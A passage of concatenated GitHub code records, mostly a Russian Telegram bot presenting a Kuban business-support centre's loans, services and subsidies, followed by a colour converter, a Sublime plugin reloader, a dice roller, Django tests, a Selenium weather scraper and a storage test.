bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/SWWuLwYzRwDXejBE2\")\n keyboard = types.InlineKeyboardMarkup()\n url_button = types.InlineKeyboardButton(text=\"Узнать подробнее\", url=\"http://fmkk.ru/types/start/\")\n keyboard.add(url_button)\n bot.send_message(message.chat.id, \"Микрозайм для начинающих субъектов малого и среднего предпринимательства\", reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для консультации on-line напишите 
@RAGoncharov\")\n botan.track(constants.botan_key, message.chat.id, message, \"Старт\")\n if message.text == \"Фермер\":\n bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/U2wgWWIPjeTjwdxb2\")\n keyboard = types.InlineKeyboardMarkup()\n url_button = types.InlineKeyboardButton(text=\"Узнать подробнее\", url=\"http://fmkk.ru/types/fermer/\")\n keyboard.add(url_button)\n bot.send_message(message.chat.id, \"Микрозайм для действующих субъектов малого и среднего предпринимательства, организаций инфраструктуры поддержки малого и среднего предпринимательства\", reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для консультации on-line напишите @RAGoncharov\")\n botan.track(constants.botan_key, message.chat.id, message, \"Фермер\")\n if message.text == \"Бизнес-оборот\":\n bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/cIoyHDGBVY914YRE2\")\n keyboard = types.InlineKeyboardMarkup()\n url_button = types.InlineKeyboardButton(text=\"Узнать подробнее\", url=\"http://fmkk.ru/types/biznes_oborot/\")\n keyboard.add(url_button)\n bot.send_message(message.chat.id, \"Микрозайм для действующих субъектов малого и среднего предпринимательства, организаций инфраструктуры поддержки малого и среднего предпринимательства на пополнение оборотных средств\", reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для консультации on-line напишите @RAGoncharov\")\n botan.track(constants.botan_key, message.chat.id, message, \"Биз-оборот\")\n if message.text == \"Ремесленник\":\n bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/kRFKZ6RRyw3VYjVC2\")\n keyboard = types.InlineKeyboardMarkup()\n url_button = types.InlineKeyboardButton(text=\"Узнать подробнее\", url=\"http://fmkk.ru/types/remeslennik/\")\n keyboard.add(url_button)\n bot.send_message(message.chat.id, \"Микрозайм для действующих субъектов малого и среднего предпринимательства, организаций инфраструктуры поддержки малого и среднего предпринимательства\", reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для консультации on-line напишите @RAGoncharov\")\n botan.track(constants.botan_key, message.chat.id, message, \"Ремесленник\")\n if message.text == \"Бизнес-инвест\":\n bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/3WL9HJn3HcbW8Fjr2\")\n keyboard = types.InlineKeyboardMarkup()\n url_button = types.InlineKeyboardButton(text=\"Узнать подробнее\", url=\"http://fmkk.ru/types/biznes_invest/\")\n keyboard.add(url_button)\n bot.send_message(message.chat.id, \"Микрозайм для действующих субъектов малого и среднего предпринимательства, организаций инфраструктуры поддержки малого и среднего предпринимательства на инвестиционные цели\", reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для консультации on-line напишите @RAGoncharov\")\n botan.track(constants.botan_key, message.chat.id, message, \"Биз-инвест\")\n if message.text == \"Новотех\":\n bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/sUY6BDdTPG7l4wPI3\")\n keyboard = types.InlineKeyboardMarkup()\n url_button = types.InlineKeyboardButton(text=\"Узнать подробнее\", url=\"http://fmkk.ru/types/novotekh/\")\n keyboard.add(url_button)\n bot.send_message(message.chat.id, \"Микрозайм для действующих субъектов малого и среднего предпринимательства, организаций инфраструктуры поддержки малого и среднего предпринимательства на цели приобретения новых основных средств под их залог\", reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для консультации on-line напишите 
@RAGoncharov\")\n botan.track(constants.botan_key, message.chat.id, message, \"Новотех\")\n if message.text == \"Развитие и инновации\":\n bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/0rjdE8954a00gfgq2\")\n keyboard = types.InlineKeyboardMarkup()\n url_button = types.InlineKeyboardButton(text=\"Узнать подробнее\", url=\"http://fmkk.ru/types/razvitie_i_innovatsii/\")\n keyboard.add(url_button)\n bot.send_message(message.chat.id, \"Микрозайм для действующих субъектов малого и среднего предпринимательства, организаций инфраструктуры поддержки малого и среднего предпринимательства\", reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для консультации on-line напишите @RAGoncharov\")\n botan.track(constants.botan_key, message.chat.id, message, \"разв и инновации\")\n if message.text == \"Поручительства\":\n bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/l5zfkQ1FILKQoTCA2\")\n keyboard = types.InlineKeyboardMarkup(row_width=2)\n url_button1 = types.InlineKeyboardButton(text=\"Узнать подробнее\", url=\"http://www.mbkuban.ru/financial-support/surety/\")\n url_button2 = types.InlineKeyboardButton(text=\"Условия (101.33кБ)\",\n url=\"http://www.mbkuban.ru/upload/iblock/a16/a161d37b98b02959bbb405d4e7cffeff.docx\")\n keyboard.add(url_button1, url_button2)\n bot.send_message(message.chat.id, \"Привлечение поручительства в случае нехватки залоговой базы. Максимальная сумма поручительства 25 млн. рублей (не > 70% от суммы займа или банковской гарантии)\", reply_markup=keyboard)\n botan.track(constants.botan_key, message.chat.id, message, \"Поручительства\")\n if message.text == \"✴Услуги\":\n bm.uslugi_menu(bot, message)\n botan.track(constants.botan_key, message.chat.id, message, \"Услуги\")\n if message.text == \"Разработка бизнес-планов\":\n keyboard = types.InlineKeyboardMarkup(row_width=2)\n url_button1 = types.InlineKeyboardButton(text=\"Узнать подробнее\",\n url=\"http://mbkuban.ru/cpp/services/\")\n keyboard.add(url_button1)\n bot.send_message(message.chat.id,\n \"Бизнес план – это документ, дающий развернутое обоснование проекта и возможность всесторонне оценить эффективность принятых решений, планируемых мероприятий, ответить на вопрос, стоит ли вкладывать деньги в данный проект.\",\n reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для записи on-line напишите @CPP_Makeeva\")\n botan.track(constants.botan_key, message.chat.id, message, \"Разраб.биз.планов\")\n if message.text == \"Разработка веб-сайтов\":\n keyboard = types.InlineKeyboardMarkup(row_width=2)\n url_button1 = types.InlineKeyboardButton(text=\"Узнать подробнее\",\n url=\"http://mbkuban.ru/cpp/services/\")\n keyboard.add(url_button1)\n bot.send_message(message.chat.id,\n \"Разработка сайтов – важный элемент современного бизнеса. Сайт – это отличная возможность увеличения продаж и клиентской базы. 
Современный рынок диктует свои правила и сейчас для любой организации, которая хочет добиться успеха в своей нише, очень важно иметь собственный веб-ресурс.\",\n reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для записи on-line напишите @CPP_Makeeva\")\n botan.track(constants.botan_key, message.chat.id, message, \"Разр.биз.планов\")\n if message.text == \"Создание фирменного стиля\":\n keyboard = types.InlineKeyboardMarkup(row_width=2)\n url_button1 = types.InlineKeyboardButton(text=\"Узнать подробнее\",\n url=\"http://mbkuban.ru/cpp/services/\")\n keyboard.add(url_button1)\n bot.send_message(message.chat.id,\n \"Фирменный стиль – фирменный стиль помогает потребителю быстрее и проще распознавать и запоминать бренд в условиях высокой конкуренции.\",\n reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для записи on-line напишите @CPP_Makeeva\")\n botan.track(constants.botan_key, message.chat.id, message, \"Фир.стиль\")\n if message.text == \"Маркетинговые исследования\":\n keyboard = types.InlineKeyboardMarkup(row_width=2)\n url_button1 = types.InlineKeyboardButton(text=\"Узнать подробнее\",\n url=\"http://mbkuban.ru/cpp/services/\")\n keyboard.add(url_button1)\n bot.send_message(message.chat.id,\n \"Маркетинговые исследования – это систематический сбор, документирование и анализ данных по разным аспектам маркетинговой деятельности. Цель маркетингового исследования — создать информационно-аналитическую базу для принятия управленческих решений.\",\n reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для записи on-line напишите @CPP_Makeeva\")\n botan.track(constants.botan_key, message.chat.id, message, \"Маркет.исследование\")\n if message.text == \"Консультации\":\n keyboard = types.InlineKeyboardMarkup(row_width=2)\n url_button1 = types.InlineKeyboardButton(text=\"Узнать подробнее\",\n url=\"http://www.mbkuban.ru/cpp/consultations/\")\n keyboard.add(url_button1)\n bot.send_message(message.chat.id,\n \"Консультационные услуги по различным вопросам\",\n reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для записи on-line напишите @CPP_Makeeva\")\n botan.track(constants.botan_key, message.chat.id, message, \"Консультации\")\n if message.text == \"Иные услуги\":\n bot.send_message(message.chat.id, \"Если у Вас есть вопросы, то напишите нам @CPP_Makeeva\")\n botan.track(constants.botan_key, message.chat.id, message, \"Иные услуги\")\n if message.text == \"🎓Обучение\":\n bm.grad_menu(bot, message)\n botan.track(constants.botan_key, message.chat.id, message, \"Обучение\")\n if message.text == \"Семинары центра поддержки\":\n bot.send_photo(message.from_user.id, photo=\"http://kuban24.tv/media/cache/item/res/images/07122017/282696.jpg\")\n keyboard = types.InlineKeyboardMarkup()\n url_button = types.InlineKeyboardButton(text=\"Узнать подробнее\", url=\"http://mbkuban.ru/cpp/events/\")\n keyboard.add(url_button)\n bot.send_message(message.chat.id,\n \"В 2017 году ЦПП провело более 180 семинаров, тренингов, мастер-классов и иных бесплатных образовательных мероприятий.\",\n reply_markup=keyboard)\n botan.track(constants.botan_key, message.chat.id, message, \"Семинары ЦПП\")\n if message.text == \"Школа молодого предпринимателя\":\n bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/fJLaG8rpCpW2Yuhj2\")\n bot.send_message(message.chat.id,\n \"В Краснодаре на постоянной основе проходит Школа молодого предпринимателя. 
Образовательная программа сочетает в себе основы теории и практики ведения бизнеса.\")\n bot.send_message(message.chat.id, \"Написать куратору проекта @Silchenko_Kris\")\n botan.track(constants.botan_key, message.chat.id, message, \"ШМП\")\n if message.text == \"«Бизнес класс»\":\n bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/geJf0pZCe2Hp8GVb2\")\n keyboard = types.InlineKeyboardMarkup(row_width=2)\n url_button1 = types.InlineKeyboardButton(text=\"Регистрация в проекте\",\n url=\"https://www.business-class.pro/\")\n keyboard.add(url_button1)\n bot.send_message(message.chat.id,\n \"Один из самых успешных проектов по повышению предпринимательских навыков – «Бизнес класс», реализуемый ПАО «Сбербанк» и Google\",\n reply_markup=keyboard)\n botan.track(constants.botan_key, message.chat.id, message, \"Биз.класс\")\n if message.text == \"🏢Коворкинг\":\n bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/4rz7GGEDOtpqFAgV2\")\n keyboard = types.InlineKeyboardMarkup(row_width=1)\n url_button1 = types.InlineKeyboardButton(text=\"Больше фото\",\n url=\"https://drive.google.com/open?id=1mKRj6L16YcGlesnr7deHNOJBRy4kq0U8\")\n url_button2 = types.InlineKeyboardButton(text=\"Больше информация на www.mbkuban.ru\",\n url=\"www.mbkuban.ru/cowork\")\n url_button3 = types.InlineKeyboardButton(text=\"Наш аккаунт Instagram\",\n url=\"www.instagram.com/mdcoworking\")\n url_button4 = types.InlineKeyboardButton(text=\"Наш аккаунт ВКонтакте\",\n url=\"www.vk.com/mdcoworking\")\n url_button5 = types.InlineKeyboardButton(text=\"Наш аккаунт Facebook\",\n url=\"www.facebook.com/mdcoworking\")\n keyboard.add(url_button1, url_button2, url_button3, url_button4, url_button5)\n bot.send_message(message.chat.id,\n \"Государственный коворкинг для предпринимателей «Место действия». Пространство для развития вашего стартапа. Консультации специалистов по вашему бизнесу, бухгалтерское и юридическое сопровождение и мудрые наставники!\",\n reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Написать администратору @Burakov_Sergey\")\n botan.track(constants.botan_key, message.chat.id, message, \"Коворкинг\")\n if message.text == \"📅События\":\n keyboard = types.InlineKeyboardMarkup(row_width=1)\n but_2 = types.InlineKeyboardButton(text=\"Ближайшие 5 событий\", callback_data=\"sobit5\")\n keyboard.add(but_2)\n bot.send_message(message.chat.id, \"Будьте в курсе основных событий в бизнесе Кубани! Подпишитесь на наш канал и узнайте о ближайщих событиях в крае\", reply_markup=keyboard)\n botan.track(constants.botan_key, message.chat.id, message, \"События\")\n if message.text == \"📦Пакеты услуг\":\n bm.paketi_menu(bot, message)\n botan.track(constants.botan_key, message.chat.id, message, \"Пакеты\")\n if message.text == \"🚀Открывай\":\n bot.send_message(message.chat.id, \"\"\"\\r\nОТКРЫВАЙ\nВозможность открыть бизнес легко и без ошибок\\n\nКонсультации: \nпо вопросам регистрации в качестве индивидуального предпринимателя\nпо вопросам выбора формы собственности и системы налогообложения\nпо постановке управленческого учета и др.\nпо составлению бухгалтерской и налоговой отчетности\nпо действующим налоговым льготам\nпо возможностям портала Бизнес-Навигатор МСП\nпо действующим программам субсидирования предпринимателей. 
\\n\nУслуги: \nпо разработке бизнес-планов\nпо разработке или модернизации веб сайтов\nпо созданию фирменного стиля\\n\nОбучение: \nобразовательный проект «Школа молодого предпринимателя»\nобучающие мероприятия Центра поддержки предпринимательства\\n\nФинансовая поддержка: \nпредоставление микрозаймов до 700 тыс.руб. под 5,75% годовых на срок до 2 лет\\n\nИмущественная поддержка:\nпредоставление оборудованных офисных помещений в коворкинг центре «Место действия»\nпредоставление на льготных условиях помещений бизнес-инкубатора (г. Кропоткин). \\n\"\"\", parse_mode=\"HTML\")\n bot.send_message(message.chat.id, \"\"\"\\rУзнайте подробнее\"\"\", parse_mode=\"HTML\")\n bot.send_message(message.chat.id, \"+78007070711\")\n botan.track(constants.botan_key, message.chat.id, message, \"Открывай\")\n if message.text == \"📊Развивай\":\n bot.send_message(message.chat.id, \"\"\"\\r\nРАЗВИВАЙ \nИнструментарий развития действующего бизнеса \\n\nKонсультации:\nпо вопросам финансового планирования\nпо вопросам юридического сопровождения деятельности\nнаправленные на повышение доступности для малых и средних кредитных и иных финансовых ресурсов\nпо вопросам маркетингового сопровождения деятельности\nпо патентно-лицензионному сопровождению деятельности\nпо организации сертификации товаров, работ и услуг\nпо информационному сопровождению деятельности\nпо действующим программам субсидирования предпринимателей в сфере сельского хозяйства, промышленности, инноваций, занятости населения\\n\nУслуги:\nпо разработке бизнес-планов\nпо разработке или модернизации веб сайтов\nпо созданию фирменного стиля\nпо проведению маркетингового исследованию\nпо регистрации товарного знака\nпо анализу потенциала компании\\n\nОбучение:\nобразовательный проект «Школа молодого предпринимателя»\nсеминары, бизнес-тренинги, круглые столы, конференции Центра поддержки предпринимательства\nпрограмма Корпорации МСП «Азбука предпринимательства» \\n\nФинансовая поддержка:\nпредоставление микрозаймов до 3 млн. руб. под 7,75% годовых на срок до 3 лет\nпоручительства по кредитам, займам и банковским гарантиям до 70% от суммы кредита, но не более 25 млн. руб.\nсубсидии\\n\nИмущественная поддержка:\nпредоставление оборудованных офисных помещений в коворкинг центре «Место действия»\nконсультирование по вопросам предоставления муниципального имущества\nпредоставление на льготных условиях помещений бизнес-инкубатора (г. Кропоткин)\\n\"\"\", parse_mode=\"HTML\")\n bot.send_message(message.chat.id, \"\"\"\\rУзнайте подробнее\"\"\", parse_mode=\"HTML\")\n bot.send_message(message.chat.id, \"+78007070711\")\n botan.track(constants.botan_key, message.chat.id, message, \"Развивай\")\n if message.text == \"✅Производи\":\n bot.send_message(message.chat.id, \"\"\"\\r\nПРОИЗВОДИ \nПриоритетная поддержка для производственных компаний \\n\n\nКонсультации:\nпо повышению эффективности действующего производства\nпо действующим программам субсидирования предпринимателей в сфере сельского хозяйства, промышленности, инноваций, занятости населения\\n\nУслуги:\nпо разработке бизнес-планов\nпо разработке или модернизации веб сайтов\nпо созданию фирменного стиля\nпо проведению маркетингового исследованию\nпо регистрации товарного знака\nпо анализу потенциала компании\nпо модернизации технического перевооружения производства\\n\nОбучение:\nпо программе «Проектный подход к управлению бизнесом»\nсеминары, бизнес-тренинги, круглые столы, конференции Центра поддержки предпринимательства\\n\nФинансовая поддержка:\nпредоставление микрозаймов до 3 млн. руб. 
под 7,75% годовых на срок до 3 лет\nпоручительства по кредитам, займам и банковским гарантиям до 70% от суммы кредита, но не более 25 млн. руб.\nразработка проектной документации и образцов, модернизация существующего оборудования на условиях софинансирования\nпредоставление налоговых льгот промышленным инвесторам в рамках специальных инвестиционный контрактов\nсубсидии\\n\nИмущественная поддержка:\nпредоставление оборудованных офисных помещений в коворкинг центре «Место действия»\nконсультирование по вопросам предоставления муниципального имущества\\n\"\"\", parse_mode=\"HTML\")\n bot.send_message(message.chat.id, \"\"\"\\rУзнайте подробнее\"\"\", parse_mode=\"HTML\")\n bot.send_message(message.chat.id, \"+78007070711\")\n botan.track(constants.botan_key, message.chat.id, message, \"Производи\")\n if message.text == \"🚚Экспортируй\":\n bot.send_message(message.chat.id, \"\"\"\\r\nЭКСПОРТИРУЙ \nПоддержка экспортоориентированного бизнеса \\n\n\nKонсультации:\nпо тематике ведения внешнеэкономической деятельности\\n\nОбучение:\nсеминары, бизнес-тренинги, круглые столы, конференции Центра поддержки экспорта;\nпо образовательной программе РЭЦ «Жизненный цикл экспортных проектов» \\n\nЭкспортная поддержка:\nучастие в международных бизнес-миссиях;\nучастие в международных выставках за рубежом и на территории Российской Федерации;\nподготовка и перевод на иностранные языки презентационных материалов;\nпроведение B2B-переговоров с иностранными партнерами;\nсоздание и (или) модернизация сайта, в том числе на иностранном языке\\n\"\"\", parse_mode=\"HTML\")\n bot.send_message(message.chat.id, \"\"\"\\rУзнайте подробнее\"\"\", parse_mode=\"HTML\")\n bot.send_message(message.chat.id, \"+78007070711\")\n botan.track(constants.botan_key, message.chat.id, message, \"Экспортируй\")\n if message.text == \"Промышленность\":\n key = types.InlineKeyboardMarkup(row_width=1)\n but_1 = types.InlineKeyboardButton(text=\"При организации трудовой занятости осужденных\", callback_data=\"sub1\")\n but_2 = types.InlineKeyboardButton(text=\"На технологическое присоединение \", callback_data=\"sub2\")\n but_3 = types.InlineKeyboardButton(text=\"На уплату % по кредитам полученным для пополнения оборотных средств\", callback_data=\"sub3\")\n but_4 = types.InlineKeyboardButton(text=\"На уплату % по кредитам и на уплату дохода лизинговых компаний\", callback_data=\"sub4\")\n but_5 = types.InlineKeyboardButton(text=\"На возмещение затрат, связанных с осуществ.образоват.деятельности\", callback_data=\"sub5\")\n but_6 = types.InlineKeyboardButton(text=\"На возмещение части затрат на реализацию инвестиционных проектов\", callback_data=\"sub6\")\n but_7 = types.InlineKeyboardButton(text=\"Контакты\", callback_data=\"prom\")\n key.add(but_1, but_2, but_3, but_4, but_5, but_6, but_7)\n bot.send_message(message.chat.id, \"Субсидии департамента промышленной политики Краснодарского края\", reply_markup=key)\n botan.track(constants.botan_key, message.chat.id, message, \"Суб.деп.промышл.\")\n if message.text == \"Сельское хозяйство\":\n key = types.InlineKeyboardMarkup(row_width=1)\n but_1 = types.InlineKeyboardButton(text=\"Сельхозстрахование\", callback_data=\"sh1\")\n but_2 = types.InlineKeyboardButton(text=\"Приобретение элитных семян\", callback_data=\"sh2\")\n but_3 = types.InlineKeyboardButton(text=\"Поддержка племенного крупного рогатого скота мясного направления\", callback_data=\"sh3\")\n but_4 = types.InlineKeyboardButton(text=\"Субсидии на развитие садоводства и чаеводства\", callback_data=\"sh4\")\n but_5 = 
types.InlineKeyboardButton(text=\"Ознакомиться с другими субсидиями\", callback_data=\"sh5\")\n but_6 = types.InlineKeyboardButton(text=\"Контакты\", callback_data=\"sh\")\n key.add(but_1, but_2, but_3, but_4, but_5, but_6)\n bot.send_message(message.chat.id, \"Субсидии министерства сельского хозяйства и перерабатывающей промышленности Краснодарского края\", reply_markup=key)\n botan.track(constants.botan_key, message.chat.id, message, \"Суб.деп.промышл.\")\n if message.text == \"Служба занятости\":\n key = types.InlineKeyboardMarkup(row_width=1)\n but_1 = types.InlineKeyboardButton(text=\"Возмещение затрат на подготовку документов, представляемых при государственной регистрации\", callback_data=\"trud1\")\n but_2 = types.InlineKeyboardButton(text=\"Возмещение части затрат на дополнительное рабочее место для трудоустройства безработных граждан\", callback_data=\"trud2\")\n but_3 = types.InlineKeyboardButton(text=\"Единовременная финансовая помощь на открытие индивидуального предпринимателя или юридического лица\", callback_data=\"trud3\")\n but_6 = types.InlineKeyboardButton(text=\"Контакты\", callback_data=\"trud\")\n key.add(but_1, but_2, but_3, but_6)\n bot.send_message(message.chat.id, \"Субсидии службы труда и занятости населения министерства труда и социального развития Краснодарского края\", reply_markup=key)\n botan.track(constants.botan_key, message.chat.id, message, \"Служба занятости\")\n if message.text == \"✒Жалобы и предложения\":\n bot.send_message(message.chat.id, \"Если у Вас есть вопросы, то напишите нам @VSVoronov @avdeev_v\")\n botan.track(constants.botan_key, message.chat.id, message, \"Жалобы и предложения\")\n if message.text == \"📝Консультация On-Line\":\n bot.send_message(message.chat.id, \"Для консультации on-line пишите @CPP_Makeeva\")\n botan.track(constants.botan_key, message.chat.id, message, \"Консультация On-Line\")\n\nwhile True:\n try:\n\n bot.polling(none_stop=True)\n\n except Exception as err:\n\n logging.error(err)\n\n time.sleep(5)\n\n print\n \"Internet error!\"","repo_name":"JackPot777/mbkuban_telegramBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":59516,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26062216623","text":"class Converter:\n def rgb_to_yiq(self, r_channel: list, g_channel: list, b_channel: list):\n y_channel = []\n i_channel = []\n q_channel = []\n\n for i in range(len(r_channel)):\n y_channel_row = []\n i_channel_row = []\n q_channel_row = []\n\n for j in range(len(r_channel[0])):\n y_value = round(0.299*r_channel[i][j] + 0.587*g_channel[i][j] + 0.114*b_channel[i][j])\n i_value = round(0.596*r_channel[i][j] - 0.274*g_channel[i][j] - 0.322*b_channel[i][j])\n q_value = round(0.211*r_channel[i][j] - 0.523*g_channel[i][j] + 0.312*b_channel[i][j])\n\n y_channel_row.append(y_value)\n i_channel_row.append(i_value)\n q_channel_row.append(q_value)\n \n y_channel.append(y_channel_row)\n i_channel.append(i_channel_row)\n q_channel.append(q_channel_row)\n\n return y_channel, i_channel, q_channel\n\n def _truncate_values_outside_limits(self, value, min_value=0, max_value=255):\n if value < min_value:\n return min_value\n elif max_value < value:\n return max_value\n else:\n return value\n\n def yiq_to_rgb(self, y_channel: list, i_channel: list, q_channel: list) -> (list, list, list):\n r_channel = []\n g_channel = []\n b_channel = []\n\n for i in range(len(y_channel)):\n r_channel_row = []\n g_channel_row = []\n b_channel_row = []\n \n for j in 
range(len(y_channel[0])):\n r = round(1.0*y_channel[i][j] + 0.956*i_channel[i][j] + 0.621*q_channel[i][j])\n g = round(1.0*y_channel[i][j] - 0.272*i_channel[i][j] - 0.647*q_channel[i][j])\n b = round(1.0*y_channel[i][j] - 1.106*i_channel[i][j] + 1.703*q_channel[i][j])\n\n r_channel_row.append(self._truncate_values_outside_limits(r, min_value=0, max_value=255))\n g_channel_row.append(self._truncate_values_outside_limits(g, min_value=0, max_value=255))\n b_channel_row.append(self._truncate_values_outside_limits(b, min_value=0, max_value=255))\n \n r_channel.append(r_channel_row)\n g_channel.append(g_channel_row)\n b_channel.append(b_channel_row)\n\n return r_channel, g_channel, b_channel","repo_name":"Drayton80/University-DigitalImageProcessing","sub_path":"Converter.py","file_name":"Converter.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21456081045","text":"# coding: utf-8\nimport sys\nimport sublime\n\nst_version = 2\n\nif sublime.version() == '' or int(sublime.version()) > 3000:\n st_version = 3\n from imp import reload\n\nmod_prefix = ''\nreload_mods = []\n\nfor mod in sys.modules:\n if mod.startswith('JoomlaPack') and sys.modules[mod] is not None:\n reload_mods.append(mod)\n\nif st_version == 3:\n mod_prefix = 'JoomlaPack' + mod_prefix\n\nmods_load_order = [\n '',\n\n '.lib',\n\n '.lib.inflector',\n '.lib.inflector.base',\n '.lib.inflector.english',\n\n '.lib.file',\n '.lib.folder',\n '.lib.helper',\n '.lib.json',\n '.lib.manifest',\n '.lib.project',\n\n '.lib.extensions',\n '.lib.extensions.base',\n '.lib.extensions.component',\n '.lib.extensions.package',\n '.lib.extensions.plugin',\n\n '.commands',\n '.commands.component',\n '.commands.package',\n '.commands.plugin'\n]\n\nfor mod in mods_load_order:\n mod = mod_prefix + mod\n if mod in reload_mods:\n try:\n reload(sys.modules[mod])\n except ImportError as e:\n sublime.error_message('Joomla Pack\\n\\n[Error] Modules could not ' +\n 'be imported! %s' % e)\n","repo_name":"renebentes/JoomlaPack","sub_path":"reloader.py","file_name":"reloader.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"36437029986","text":"import random\n\nwhile True:\n dice_no = random.randint(1, 6)\n if dice_no == 1:\n print(\" \\n 0 \\n \")\n elif dice_no == 2:\n print(\" 0\\n \\n0 \")\n elif dice_no == 3:\n print(\"0 \\n 0 \\n 0\")\n elif dice_no == 4:\n print(\"0 0\\n \\n0 0\")\n elif dice_no == 5:\n print(\"0 0\\n 0 \\n0 0\")\n else:\n print(\"0 0\\n0 0\\n0 0\")\n\n close_or_restart = input(\"Spin again? enter y for yes and n for no\").lower()\n\n if close_or_restart == \"y\":\n continue\n elif close_or_restart == \"n\":\n break\n else:\n print(\"Incorrect value!!! 
spinning again!!!\")\n continue\n\ninput(\"Press Enter to exit\")\n","repo_name":"preet-hue/python-mini-projects","sub_path":"Dice-roller.py","file_name":"Dice-roller.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10778513412","text":"from django.test import TestCase\nfrom django.urls.base import reverse\n\nfrom .models import Address, Letting\n\n\nclass LettingTest(TestCase):\n def setUp(self):\n self.address = Address.objects.create(\n number=1,\n street=\"123 rue bidon\",\n city=\"Testville\",\n state=\"Test\",\n zip_code=11111,\n country_iso_code=123,\n )\n self.letting = Letting.objects.create(title=\"youpi\", address=self.address)\n\n def test_index(self):\n url = reverse(\"lettings_index\")\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertIn(b\"Lettings\", response.content)\n self.assertIn(b\"youpi\", response.content)\n\n def test_letting(self):\n url = reverse(\"letting\", kwargs={\"letting_id\": 1})\n response = self.client.post(url)\n self.assertEqual(response.status_code, 200)\n self.assertIn(b\"123 rue bidon\", response.content)\n","repo_name":"Cocorico84/oc_lettings","sub_path":"lettings/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33368113966","text":"import csv\nimport time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\nfrom post import auto_mailing\n\n\ndef site_scrapper():\n\n driver = webdriver.Chrome()\n driver.get('https://weather.com/')\n time.sleep(3)\n\n current_url = driver.current_url\n assert current_url.find('weather.com') != -1, 'Wrong URL'\n\n city_list = []\n output_general = []\n with open('input.csv') as f:\n reader = csv.reader(f)\n for i, row in enumerate(reader):\n if i == 0:\n output_general.append(row)\n else:\n city_list.append(row[0])\n\n for city in city_list:\n input_field = driver.find_element(By.ID, 'LocationSearch_input')\n input_field.send_keys(city)\n time.sleep(3)\n\n search_result = driver.find_element(By.CSS_SELECTOR, '.SearchResults--SearchResults--LUsso').text\n\n if search_result.find('Результаты не найдены') != -1 or search_result.find('No results') != -1:\n output_general.append([\n city,\n '',\n '',\n '',\n '',\n '',\n '',\n '',\n ])\n else:\n first_element = driver.find_element(By.ID, 'LocationSearch_listbox-0')\n first_element.click()\n time.sleep(3)\n\n today_max_min = driver.find_element(By.CSS_SELECTOR, '.CurrentConditions--primary--2SVPh .CurrentConditions--tempHiLoValue--3SUHy').text.split()\n today_weather = driver.find_element(By.CSS_SELECTOR, '.CurrentConditions--primary--2SVPh .CurrentConditions--phraseValue--2Z18W').text\n\n driver.find_elements(By.CSS_SELECTOR, \"#WxuLocalsuiteNav-header-71dadf79-621d-43ff-9a1a-d99a39f16abe .Button--default--3zkvy\")[2].click()\n time.sleep(3)\n tomorrow_max_min = driver.find_element(By.CSS_SELECTOR, '#titleIndex1 .DetailsSummary--temperature--1Syw3').text.split('\\n')\n\n output_general.append([\n city,\n today_max_min[1],\n today_max_min[4],\n today_weather,\n tomorrow_max_min[0],\n tomorrow_max_min[1].lstrip('/'),\n '?',\n '?',\n ])\n\n driver.find_elements(By.CSS_SELECTOR, \"#WxuLocalsuiteNav-header-71dadf79-621d-43ff-9a1a-d99a39f16abe .Button--default--3zkvy\")[0].click()\n time.sleep(3)\n\n print(*output_general, sep='\\n')\n\n with open('output.csv', 'w', 
newline='') as out:\n writer = csv.writer(out)\n for row in output_general:\n writer.writerow(row)\n\n\nif __name__ == \"__main__\":\n\n site_scrapper()\n auto_mailing()\n","repo_name":"vagrius/web_scrapper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"42176128918","text":"from typing import List\n\nfrom docleaner.api.core.job import Job, JobType\nfrom docleaner.api.services.repository import Repository\n\n\nasync def test_store_large_documents(\n repo: Repository, job_types: List[JobType]\n) -> None:\n \"\"\"Storing and retrieving documents larger than 16 MB, which is the MongoDB BSON\n document size limit. Ensure that the repository implements a workaround to save large documents.\"\"\"\n large_document = b\"X\" * 1024 * 1024 * 20 # 20 MB payload\n jid = await repo.add_job(large_document, \"large.pdf\", job_types[0])\n await repo.update_job(jid, result=large_document)\n job = await repo.find_job(jid)\n assert isinstance(job, Job)\n assert job.src == job.result == 